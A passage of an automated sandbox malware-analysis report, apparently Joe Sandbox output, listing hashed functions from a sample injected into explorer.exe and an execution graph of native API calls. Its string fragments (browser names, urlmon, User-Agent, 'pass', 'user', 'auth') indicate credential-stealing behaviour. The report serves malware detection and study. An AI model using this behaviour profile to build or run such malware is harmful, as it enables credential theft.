                                                                                                                                            • Instruction Fuzzy Hash: 5E317030118B184FC794EFA89494BAAB7E1FBD8300F94462DA94ECB256DF38D549C752
                                                                                                                                            Function 0FAF5FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: .dll$chro$hild$me_c
                                                                                                                                            • API String ID: 0-3136806129
                                                                                                                                            • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                            • Instruction ID: 6f7f9f718079c3d5bceac5a6b7c0c7fedb5b0b9c8ca36f5f09efc3bb06b09a55
                                                                                                                                            • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                            • Instruction Fuzzy Hash: 36318F30118B184FC794EFA89494BAAB7E1FFD8300F94462DA94ACB256DF38D509C752
                                                                                                                                            Function 0FAF88C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                            • API String ID: 0-319646191
                                                                                                                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                            • Instruction ID: a62ac8105a43d0d2eddbecb1a1349f9a15b9711d1d44abd6eb3c0a969ec946c3
                                                                                                                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                            • Instruction Fuzzy Hash: 6531C231614B0D8FCB44EFA8C8847EDBBE0FB58205F40422AE54EDB251DF7C86498785
                                                                                                                                            Function 0FAF88BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                            • API String ID: 0-319646191
                                                                                                                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                            • Instruction ID: b07e31315d1918633730648ef7e5d815a3705946d0c8fa35aa38cba2ffd936f1
                                                                                                                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                            • Instruction Fuzzy Hash: EC21C170610B0D8ECB05EFE8C8847EDBBA0FF58205F40422AE55ADB251EF7C86098789
                                                                                                                                            Function 0FAF9E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: .$l$l$t
                                                                                                                                            • API String ID: 0-168566397
                                                                                                                                            • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                            • Instruction ID: 81165086277899493a086392376072b7cef356a086afea8ea841ffca28fca679
                                                                                                                                            • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                            • Instruction Fuzzy Hash: 9F218B70A24B0D9FDB08EFA8D0447EEBBF0FB58304F50462EE109D7601DB7895558B84
                                                                                                                                            Function 0FAF9E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: .$l$l$t
                                                                                                                                            • API String ID: 0-168566397
                                                                                                                                            • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                            • Instruction ID: a9398a0d3677af976c0bd142b248c88c0000f43f317d33a051015f10221ce246
                                                                                                                                            • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                            • Instruction Fuzzy Hash: C5217A70A24B0E9FDB08EFA8D0847AEBAF0FB58304F50462EE109D7611DB7895958B84
                                                                                                                                            Function 0FAF9FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: auth$logi$pass$user
                                                                                                                                            • API String ID: 0-2393853802
                                                                                                                                            • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                            • Instruction ID: 4747bf050a949317c84a880a1713ef45ad12518038a6a1f9ebfc62ad502dc6a9
                                                                                                                                            • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                            • Instruction Fuzzy Hash: E421CD30614B0D8FCB05DF9998806EEB7F1EF88344F044619E40AEB246D7B8E9188BC2

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:1.6%
                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                            Signature Coverage:0%
                                                                                                                                            Total number of Nodes:620
                                                                                                                                            Total number of Limit Nodes:67
                                                                                                                                            execution_graph 119004 3c12ad0 LdrInitializeThunk 119007 2f79040 119018 2f7bd00 119007->119018 119009 2f7907b 119010 2f7915c 119009->119010 119021 2f6ace0 119009->119021 119012 2f790b1 119026 2f74e40 119012->119026 119014 2f790e0 Sleep 119015 2f790cd 119014->119015 119015->119010 119015->119014 119031 2f78c60 LdrLoadDll 119015->119031 119032 2f78e70 LdrLoadDll 119015->119032 119033 2f7a500 119018->119033 119023 2f6ad04 119021->119023 119022 2f6ad0b 119022->119012 119023->119022 119024 2f6ad57 119023->119024 119025 2f6ad40 LdrLoadDll 119023->119025 119024->119012 119025->119024 119027 2f74e5a 119026->119027 119028 2f74e4e 119026->119028 119027->119015 119028->119027 119040 2f752c0 LdrLoadDll 119028->119040 119030 2f74fac 119030->119015 119031->119015 119032->119015 119034 2f7a51c 119033->119034 119036 2f7af20 119033->119036 119034->119009 119037 2f7af30 119036->119037 119039 2f7af52 119036->119039 119038 2f74e40 LdrLoadDll 119037->119038 119038->119039 119039->119034 119040->119030 119041 2f7f09d 119044 2f7b990 119041->119044 119045 2f7b9b6 119044->119045 119052 2f69d30 119045->119052 119047 2f7b9c2 119048 2f7b9e6 119047->119048 119060 2f68f30 119047->119060 119098 2f7a670 119048->119098 119101 2f69c80 119052->119101 119054 2f69d3d 119055 2f69d44 119054->119055 119113 2f69c20 119054->119113 119055->119047 119061 2f68f57 119060->119061 119512 2f6b1b0 119061->119512 119063 2f68f69 119516 2f6af00 119063->119516 119065 2f68f86 119073 2f68f8d 119065->119073 119587 2f6ae30 LdrLoadDll 119065->119587 119067 2f690f2 119067->119048 119069 2f68ffc 119532 2f6f400 119069->119532 119071 2f69006 119071->119067 119072 2f7bf50 2 API calls 119071->119072 119074 2f6902a 119072->119074 119073->119067 119520 2f6f370 119073->119520 119075 2f7bf50 2 API calls 119074->119075 119076 2f6903b 119075->119076 119077 2f7bf50 2 API calls 119076->119077 119078 2f6904c 119077->119078 119544 2f6ca80 119078->119544 119080 2f69059 119081 2f74a40 8 API calls 119080->119081 119082 2f69066 119081->119082 119083 2f74a40 8 API calls 119082->119083 119084 2f69077 119083->119084 119085 2f69084 119084->119085 119086 2f690a5 119084->119086 119554 2f6d610 119085->119554 119088 2f74a40 8 API calls 119086->119088 119095 2f690c1 119088->119095 119091 2f690e9 119092 2f68d00 21 API calls 119091->119092 119092->119067 119093 2f69092 119570 2f68d00 119093->119570 119095->119091 119588 2f6d6b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 119095->119588 119099 2f7af20 LdrLoadDll 119098->119099 119100 2f7a68f 119099->119100 119132 2f78b80 119101->119132 119105 2f69ca6 119105->119054 119106 2f69c9c 119106->119105 119139 2f7b270 119106->119139 119108 2f69ce3 119108->119105 119150 2f69aa0 119108->119150 119110 2f69d03 119156 2f69620 LdrLoadDll 119110->119156 119112 2f69d15 119112->119054 119114 2f69c3a 119113->119114 119115 2f7b560 LdrLoadDll 119113->119115 119491 2f7b560 119114->119491 119115->119114 119118 2f7b560 LdrLoadDll 119119 2f69c61 119118->119119 119120 2f6f170 119119->119120 119121 2f6f189 119120->119121 119495 2f6b030 119121->119495 119123 2f6f19c 119499 2f7a1a0 119123->119499 119127 2f6f1c2 119130 2f6f1ed 119127->119130 119505 2f7a220 119127->119505 119129 2f7a450 2 API calls 119131 2f69d55 119129->119131 119130->119129 119131->119047 119133 2f78b8f 119132->119133 119134 2f74e40 LdrLoadDll 119133->119134 119135 2f69c93 119134->119135 119136 2f78a30 119135->119136 119157 2f7a5c0 119136->119157 119140 2f7b289 119139->119140 119160 2f74a40 119140->119160 119142 2f7b2a1 119143 2f7b2aa 119142->119143 119199 2f7b0b0 119142->119199 119143->119108 119145 2f7b2be 119145->119143 119217 2f79ec0 119145->119217 119469 2f67ea0 119150->119469 119152 2f69aba 119153 2f69ac1 119152->119153 119482 2f68160 119152->119482 119153->119110 119156->119112 119158 2f7af20 LdrLoadDll 119157->119158 119159 2f78a45 119158->119159 119159->119106 119161 2f74d75 119160->119161 119171 2f74a54 119160->119171 119161->119142 119164 2f74b63 119285 2f7a420 LdrLoadDll 119164->119285 119165 2f74b80 119228 2f7a320 119165->119228 119168 2f74b6d 119168->119142 119169 2f74ba7 119170 2f7bd80 2 API calls 119169->119170 119174 2f74bb3 119170->119174 119171->119161 119225 2f79c10 119171->119225 119172 2f74d39 119175 2f7a450 2 API calls 119172->119175 119173 2f74d4f 119294 2f74780 LdrLoadDll NtReadFile NtClose 119173->119294 119174->119168 119174->119172 119174->119173 119179 2f74c42 119174->119179 119176 2f74d40 119175->119176 119176->119142 119178 2f74d62 119178->119142 119180 2f74ca9 119179->119180 119181 2f74c51 119179->119181 119180->119172 119182 2f74cbc 119180->119182 119183 2f74c56 119181->119183 119184 2f74c6a 119181->119184 119287 2f7a2a0 119182->119287 119286 2f74640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 119183->119286 119188 2f74c87 119184->119188 119189 2f74c6f 119184->119189 119188->119176 119243 2f74400 119188->119243 119231 2f746e0 119189->119231 119191 2f74c60 119191->119142 119193 2f74d1c 119291 2f7a450 119193->119291 119194 2f74c7d 119194->119142 119197 2f74c9f 119197->119142 119198 2f74d28 119198->119142 119201 2f7b0c1 119199->119201 119200 2f7b0d3 119200->119145 119201->119200 119202 2f7bd00 LdrLoadDll 119201->119202 119203 2f7b0f4 119202->119203 119312 2f74060 119203->119312 119205 2f7b140 119205->119145 119206 2f7b117 119206->119205 119207 2f74060 3 API calls 119206->119207 119208 2f7b139 119207->119208 119208->119205 119344 2f75380 119208->119344 119210 2f7b1ca 119211 2f7b1da 119210->119211 119438 2f7aec0 LdrLoadDll 119210->119438 119354 2f7ad30 119211->119354 119214 2f7b208 119433 2f79e80 119214->119433 119218 2f7af20 LdrLoadDll 119217->119218 119219 2f79edc 119218->119219 119463 3c12c0a 119219->119463 119220 2f79ef7 119222 2f7bd80 119220->119222 119466 2f7a630 119222->119466 119224 2f7b319 119224->119108 119226 2f7af20 LdrLoadDll 119225->119226 119227 2f74b34 119226->119227 119227->119164 119227->119165 119227->119168 119229 2f7af20 LdrLoadDll 119228->119229 119230 2f7a33c NtCreateFile 119229->119230 119230->119169 119232 2f746fc 119231->119232 119233 2f7a2a0 LdrLoadDll 119232->119233 119234 2f7471d 119233->119234 119235 2f74724 119234->119235 119236 2f74738 119234->119236 119238 2f7a450 2 API calls 119235->119238 119237 2f7a450 2 API calls 119236->119237 119239 2f74741 119237->119239 119240 2f7472d 119238->119240 119295 2f7bf90 LdrLoadDll RtlAllocateHeap 119239->119295 119240->119194 119242 2f7474c 119242->119194 119244 2f7447e 119243->119244 119245 2f7444b 119243->119245 119247 2f745c9 119244->119247 119250 2f7449a 119244->119250 119246 2f7a2a0 LdrLoadDll 119245->119246 119248 2f74466 119246->119248 119249 2f7a2a0 LdrLoadDll 119247->119249 119251 2f7a450 2 API calls 119248->119251 119255 2f745e4 119249->119255 119252 2f7a2a0 LdrLoadDll 119250->119252 119253 2f7446f 119251->119253 119254 2f744b5 119252->119254 119253->119197 119257 2f744d1 119254->119257 119258 2f744bc 119254->119258 119308 2f7a2e0 LdrLoadDll 119255->119308 119261 2f744d6 119257->119261 119262 2f744ec 119257->119262 119260 2f7a450 2 API calls 119258->119260 119259 2f7461e 119263 2f7a450 2 API calls 119259->119263 119264 2f744c5 119260->119264 119265 2f7a450 2 API calls 119261->119265 119271 2f744f1 119262->119271 119296 2f7bf50 119262->119296 119266 2f74629 119263->119266 119264->119197 119267 2f744df 119265->119267 119266->119197 119267->119197 119268 2f74503 119268->119197 119271->119268 119299 2f7a3d0 119271->119299 119272 2f74557 119277 2f7456e 119272->119277 119307 2f7a260 LdrLoadDll 119272->119307 119274 2f74575 119278 2f7a450 2 API calls 119274->119278 119275 2f7458a 119276 2f7a450 2 API calls 119275->119276 119279 2f74593 119276->119279 119277->119274 119277->119275 119278->119268 119280 2f745bf 119279->119280 119302 2f7bb50 119279->119302 119280->119197 119282 2f745aa 119283 2f7bd80 2 API calls 119282->119283 119284 2f745b3 119283->119284 119284->119197 119285->119168 119286->119191 119288 2f7af20 LdrLoadDll 119287->119288 119289 2f74d04 119288->119289 119290 2f7a2e0 LdrLoadDll 119289->119290 119290->119193 119292 2f7af20 LdrLoadDll 119291->119292 119293 2f7a46c NtClose 119292->119293 119293->119198 119294->119178 119295->119242 119309 2f7a5f0 119296->119309 119298 2f7bf68 119298->119271 119300 2f7af20 LdrLoadDll 119299->119300 119301 2f7a3ec NtReadFile 119300->119301 119301->119272 119303 2f7bb74 119302->119303 119304 2f7bb5d 119302->119304 119303->119282 119304->119303 119305 2f7bf50 2 API calls 119304->119305 119306 2f7bb8b 119305->119306 119306->119282 119307->119277 119308->119259 119310 2f7af20 LdrLoadDll 119309->119310 119311 2f7a60c RtlAllocateHeap 119310->119311 119311->119298 119313 2f74071 119312->119313 119315 2f74079 119312->119315 119313->119206 119314 2f7434c 119314->119206 119315->119314 119439 2f7cef0 119315->119439 119317 2f740cd 119318 2f7cef0 2 API calls 119317->119318 119321 2f740d8 119318->119321 119319 2f74126 119322 2f7cef0 2 API calls 119319->119322 119321->119319 119444 2f7cf90 LdrLoadDll RtlAllocateHeap RtlFreeHeap 119321->119444 119445 2f7d020 119321->119445 119325 2f7413a 119322->119325 119324 2f74197 119326 2f7cef0 2 API calls 119324->119326 119325->119324 119327 2f7d020 3 API calls 119325->119327 119328 2f741ad 119326->119328 119327->119325 119329 2f741ea 119328->119329 119332 2f7d020 3 API calls 119328->119332 119330 2f7cef0 2 API calls 119329->119330 119331 2f741f5 119330->119331 119333 2f7d020 3 API calls 119331->119333 119339 2f7422f 119331->119339 119332->119328 119333->119331 119335 2f74324 119452 2f7cf50 LdrLoadDll RtlFreeHeap 119335->119452 119337 2f7432e 119453 2f7cf50 LdrLoadDll RtlFreeHeap 119337->119453 119451 2f7cf50 LdrLoadDll RtlFreeHeap 119339->119451 119340 2f74338 119454 2f7cf50 LdrLoadDll RtlFreeHeap 119340->119454 119342 2f74342 119455 2f7cf50 LdrLoadDll RtlFreeHeap 119342->119455 119345 2f75391 119344->119345 119346 2f74a40 8 API calls 119345->119346 119348 2f753a7 119346->119348 119347 2f753fa 119347->119210 119348->119347 119349 2f753f5 119348->119349 119350 2f753e2 119348->119350 119352 2f7bd80 2 API calls 119349->119352 119351 2f7bd80 2 API calls 119350->119351 119353 2f753e7 119351->119353 119352->119347 119353->119210 119456 2f7abf0 119354->119456 119357 2f7abf0 LdrLoadDll 119358 2f7ad4d 119357->119358 119359 2f7abf0 LdrLoadDll 119358->119359 119360 2f7ad56 119359->119360 119361 2f7abf0 LdrLoadDll 119360->119361 119362 2f7ad5f 119361->119362 119363 2f7abf0 LdrLoadDll 119362->119363 119364 2f7ad68 119363->119364 119365 2f7abf0 LdrLoadDll 119364->119365 119366 2f7ad71 119365->119366 119367 2f7abf0 LdrLoadDll 119366->119367 119368 2f7ad7d 119367->119368 119369 2f7abf0 LdrLoadDll 119368->119369 119370 2f7ad86 119369->119370 119371 2f7abf0 LdrLoadDll 119370->119371 119372 2f7ad8f 119371->119372 119373 2f7abf0 LdrLoadDll 119372->119373 119374 2f7ad98 119373->119374 119375 2f7abf0 LdrLoadDll 119374->119375 119376 2f7ada1 119375->119376 119377 2f7abf0 LdrLoadDll 119376->119377 119378 2f7adaa 119377->119378 119379 2f7abf0 LdrLoadDll 119378->119379 119380 2f7adb6 119379->119380 119381 2f7abf0 LdrLoadDll 119380->119381 119382 2f7adbf 119381->119382 119383 2f7abf0 LdrLoadDll 119382->119383 119384 2f7adc8 119383->119384 119385 2f7abf0 LdrLoadDll 119384->119385 119386 2f7add1 119385->119386 119387 2f7abf0 LdrLoadDll 119386->119387 119388 2f7adda 119387->119388 119389 2f7abf0 LdrLoadDll 119388->119389 119390 2f7ade3 119389->119390 119391 2f7abf0 LdrLoadDll 119390->119391 119392 2f7adef 119391->119392 119393 2f7abf0 LdrLoadDll 119392->119393 119394 2f7adf8 119393->119394 119395 2f7abf0 LdrLoadDll 119394->119395 119396 2f7ae01 119395->119396 119397 2f7abf0 LdrLoadDll 119396->119397 119398 2f7ae0a 119397->119398 119399 2f7abf0 LdrLoadDll 119398->119399 119400 2f7ae13 119399->119400 119401 2f7abf0 LdrLoadDll 119400->119401 119402 2f7ae1c 119401->119402 119403 2f7abf0 LdrLoadDll 119402->119403 119404 2f7ae28 119403->119404 119405 2f7abf0 LdrLoadDll 119404->119405 119406 2f7ae31 119405->119406 119407 2f7abf0 LdrLoadDll 119406->119407 119408 2f7ae3a 119407->119408 119409 2f7abf0 LdrLoadDll 119408->119409 119410 2f7ae43 119409->119410 119411 2f7abf0 LdrLoadDll 119410->119411 119412 2f7ae4c 119411->119412 119413 2f7abf0 LdrLoadDll 119412->119413 119414 2f7ae55 119413->119414 119415 2f7abf0 LdrLoadDll 119414->119415 119416 2f7ae61 119415->119416 119417 2f7abf0 LdrLoadDll 119416->119417 119418 2f7ae6a 119417->119418 119419 2f7abf0 LdrLoadDll 119418->119419 119420 2f7ae73 119419->119420 119421 2f7abf0 LdrLoadDll 119420->119421 119422 2f7ae7c 119421->119422 119423 2f7abf0 LdrLoadDll 119422->119423 119424 2f7ae85 119423->119424 119425 2f7abf0 LdrLoadDll 119424->119425 119426 2f7ae8e 119425->119426 119427 2f7abf0 LdrLoadDll 119426->119427 119428 2f7ae9a 119427->119428 119429 2f7abf0 LdrLoadDll 119428->119429 119430 2f7aea3 119429->119430 119431 2f7abf0 LdrLoadDll 119430->119431 119432 2f7aeac 119431->119432 119432->119214 119434 2f7af20 LdrLoadDll 119433->119434 119435 2f79e9c 119434->119435 119462 3c12df0 LdrInitializeThunk 119435->119462 119436 2f79eb3 119436->119145 119438->119211 119440 2f7cf06 119439->119440 119441 2f7cf00 119439->119441 119442 2f7bf50 2 API calls 119440->119442 119441->119317 119443 2f7cf2c 119442->119443 119443->119317 119444->119321 119446 2f7cf90 119445->119446 119447 2f7cfed 119446->119447 119448 2f7bf50 2 API calls 119446->119448 119447->119321 119449 2f7cfca 119448->119449 119450 2f7bd80 2 API calls 119449->119450 119450->119447 119451->119335 119452->119337 119453->119340 119454->119342 119455->119314 119457 2f7ac0b 119456->119457 119458 2f74e40 LdrLoadDll 119457->119458 119459 2f7ac2b 119458->119459 119460 2f74e40 LdrLoadDll 119459->119460 119461 2f7acd7 119459->119461 119460->119461 119461->119357 119462->119436 119464 3c12c11 119463->119464 119465 3c12c1f LdrInitializeThunk 119463->119465 119464->119220 119465->119220 119467 2f7af20 LdrLoadDll 119466->119467 119468 2f7a64c RtlFreeHeap 119467->119468 119468->119224 119470 2f67eb0 119469->119470 119471 2f67eab 119469->119471 119472 2f7bd00 LdrLoadDll 119470->119472 119471->119152 119478 2f67ed5 119472->119478 119473 2f67f38 119473->119152 119474 2f79e80 2 API calls 119474->119478 119475 2f67f3e 119477 2f67f64 119475->119477 119479 2f7a580 2 API calls 119475->119479 119477->119152 119478->119473 119478->119474 119478->119475 119480 2f7bd00 LdrLoadDll 119478->119480 119485 2f7a580 119478->119485 119481 2f67f55 119479->119481 119480->119478 119481->119152 119483 2f7a580 2 API calls 119482->119483 119484 2f6817e 119483->119484 119484->119110 119486 2f7af20 LdrLoadDll 119485->119486 119487 2f7a59c 119486->119487 119490 3c12c70 LdrInitializeThunk 119487->119490 119488 2f7a5b3 119488->119478 119490->119488 119492 2f7b583 119491->119492 119493 2f6ace0 LdrLoadDll 119492->119493 119494 2f69c4b 119493->119494 119494->119118 119496 2f6b053 119495->119496 119498 2f6b0d0 119496->119498 119510 2f79c50 LdrLoadDll 119496->119510 119498->119123 119500 2f7af20 LdrLoadDll 119499->119500 119501 2f6f1ab 119500->119501 119501->119131 119502 2f7a790 119501->119502 119503 2f7af20 LdrLoadDll 119502->119503 119504 2f7a7af LookupPrivilegeValueW 119503->119504 119504->119127 119506 2f7af20 LdrLoadDll 119505->119506 119507 2f7a23c 119506->119507 119511 3c12ea0 LdrInitializeThunk 119507->119511 119508 2f7a25b 119508->119130 119510->119498 119511->119508 119513 2f6b1b9 119512->119513 119514 2f6b030 LdrLoadDll 119513->119514 119515 2f6b1f4 119514->119515 119515->119063 119517 2f6af24 119516->119517 119589 2f79c50 LdrLoadDll 119517->119589 119519 2f6af5e 119519->119065 119521 2f6f39c 119520->119521 119522 2f6b1b0 LdrLoadDll 119521->119522 119523 2f6f3ae 119522->119523 119590 2f6f280 119523->119590 119526 2f6f3e1 119529 2f6f3f2 119526->119529 119531 2f7a450 2 API calls 119526->119531 119527 2f6f3c9 119528 2f6f3d4 119527->119528 119530 2f7a450 2 API calls 119527->119530 119528->119069 119529->119069 119530->119528 119531->119529 119533 2f6f42c 119532->119533 119609 2f6b2a0 119533->119609 119535 2f6f43e 119536 2f6f280 3 API calls 119535->119536 119537 2f6f44f 119536->119537 119538 2f6f471 119537->119538 119539 2f6f459 119537->119539 119541 2f6f482 119538->119541 119543 2f7a450 2 API calls 119538->119543 119540 2f6f464 119539->119540 119542 2f7a450 2 API calls 119539->119542 119540->119071 119541->119071 119542->119540 119543->119541 119545 2f6ca96 119544->119545 119546 2f6caa0 119544->119546 119545->119080 119547 2f6af00 LdrLoadDll 119546->119547 119548 2f6cb3e 119547->119548 119549 2f6cb64 119548->119549 119550 2f6b030 LdrLoadDll 119548->119550 119549->119080 119551 2f6cb80 119550->119551 119552 2f74a40 8 API calls 119551->119552 119553 2f6cbd5 119552->119553 119553->119080 119555 2f6d636 119554->119555 119556 2f6b030 LdrLoadDll 119555->119556 119557 2f6d64a 119556->119557 119613 2f6d300 119557->119613 119559 2f6908b 119560 2f6cbf0 119559->119560 119561 2f6cc16 119560->119561 119562 2f6b030 LdrLoadDll 119561->119562 119563 2f6cc99 119561->119563 119562->119563 119564 2f6b030 LdrLoadDll 119563->119564 119565 2f6cd06 119564->119565 119566 2f6af00 LdrLoadDll 119565->119566 119567 2f6cd6f 119566->119567 119568 2f6b030 LdrLoadDll 119567->119568 119569 2f6ce1f 119568->119569 119569->119093 119572 2f68d14 119570->119572 119642 2f6f6c0 119570->119642 119583 2f68f25 119572->119583 119647 2f74390 119572->119647 119574 2f68d70 119574->119583 119650 2f68ab0 119574->119650 119577 2f7cef0 2 API calls 119578 2f68db2 119577->119578 119579 2f7d020 3 API calls 119578->119579 119584 2f68dc7 119579->119584 119580 2f67ea0 3 API calls 119580->119584 119583->119048 119584->119580 119584->119583 119585 2f6c7a0 16 API calls 119584->119585 119586 2f68160 2 API calls 119584->119586 119655 2f6f660 119584->119655 119659 2f6f070 19 API calls 119584->119659 119585->119584 119586->119584 119587->119073 119588->119091 119589->119519 119591 2f6f29a 119590->119591 119599 2f6f350 119590->119599 119592 2f6b030 LdrLoadDll 119591->119592 119593 2f6f2bc 119592->119593 119600 2f79f00 119593->119600 119595 2f6f2fe 119603 2f79f40 119595->119603 119598 2f7a450 2 API calls 119598->119599 119599->119526 119599->119527 119601 2f7af20 LdrLoadDll 119600->119601 119602 2f79f1c 119601->119602 119602->119595 119604 2f7af20 LdrLoadDll 119603->119604 119605 2f79f5c 119604->119605 119608 3c135c0 LdrInitializeThunk 119605->119608 119606 2f6f344 119606->119598 119608->119606 119610 2f6b2c7 119609->119610 119611 2f6b030 LdrLoadDll 119610->119611 119612 2f6b303 119611->119612 119612->119535 119614 2f6d317 119613->119614 119622 2f6f700 119614->119622 119618 2f6d38b 119619 2f6d392 119618->119619 119633 2f7a260 LdrLoadDll 119618->119633 119619->119559 119621 2f6d3a5 119621->119559 119623 2f6f725 119622->119623 119634 2f681a0 119623->119634 119625 2f6d35f 119630 2f7a6a0 119625->119630 119626 2f74a40 8 API calls 119628 2f6f749 119626->119628 119628->119625 119628->119626 119629 2f7bd80 2 API calls 119628->119629 119641 2f6f540 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 119628->119641 119629->119628 119631 2f7af20 LdrLoadDll 119630->119631 119632 2f7a6bf CreateProcessInternalW 119631->119632 119632->119618 119633->119621 119635 2f6829f 119634->119635 119636 2f681b5 119634->119636 119635->119628 119636->119635 119637 2f74a40 8 API calls 119636->119637 119639 2f68222 119637->119639 119638 2f68249 119638->119628 119639->119638 119640 2f7bd80 2 API calls 119639->119640 119640->119638 119641->119628 119643 2f74e40 LdrLoadDll 119642->119643 119644 2f6f6df 119643->119644 119645 2f6f6e6 SetErrorMode 119644->119645 119646 2f6f6ed 119644->119646 119645->119646 119646->119572 119660 2f6f490 119647->119660 119649 2f743b6 119649->119574 119651 2f7bd00 LdrLoadDll 119650->119651 119652 2f68ad5 119651->119652 119654 2f68cea 119652->119654 119679 2f79840 119652->119679 119654->119577 119656 2f6f673 119655->119656 119727 2f79e50 119656->119727 119659->119584 119661 2f6f4ad 119660->119661 119667 2f79f80 119661->119667 119663 2f6f4f5 119663->119649 119668 2f7af20 LdrLoadDll 119667->119668 119669 2f79f9c 119668->119669 119677 3c12f30 LdrInitializeThunk 119669->119677 119670 2f6f4ee 119670->119663 119672 2f79fd0 119670->119672 119673 2f7af20 LdrLoadDll 119672->119673 119674 2f79fec 119673->119674 119678 3c12d10 LdrInitializeThunk 119674->119678 119675 2f6f51e 119675->119649 119677->119670 119678->119675 119680 2f7bf50 2 API calls 119679->119680 119681 2f79857 119680->119681 119700 2f69310 119681->119700 119683 2f79872 119684 2f798b0 119683->119684 119685 2f79899 119683->119685 119688 2f7bd00 LdrLoadDll 119684->119688 119686 2f7bd80 2 API calls 119685->119686 119687 2f798a6 119686->119687 119687->119654 119689 2f798ea 119688->119689 119690 2f7bd00 LdrLoadDll 119689->119690 119691 2f79903 119690->119691 119697 2f79ba4 119691->119697 119706 2f7bd40 LdrLoadDll 119691->119706 119693 2f79b89 119694 2f79b90 119693->119694 119693->119697 119695 2f7bd80 2 API calls 119694->119695 119696 2f79b9a 119695->119696 119696->119654 119698 2f7bd80 2 API calls 119697->119698 119699 2f79bf9 119698->119699 119699->119654 119701 2f69335 119700->119701 119702 2f6ace0 LdrLoadDll 119701->119702 119703 2f69368 119702->119703 119705 2f6938d 119703->119705 119707 2f6cf10 119703->119707 119705->119683 119706->119693 119708 2f6cf3c 119707->119708 119709 2f7a1a0 LdrLoadDll 119708->119709 119710 2f6cf55 119709->119710 119711 2f6cf5c 119710->119711 119718 2f7a1e0 119710->119718 119711->119705 119715 2f6cf97 119716 2f7a450 2 API calls 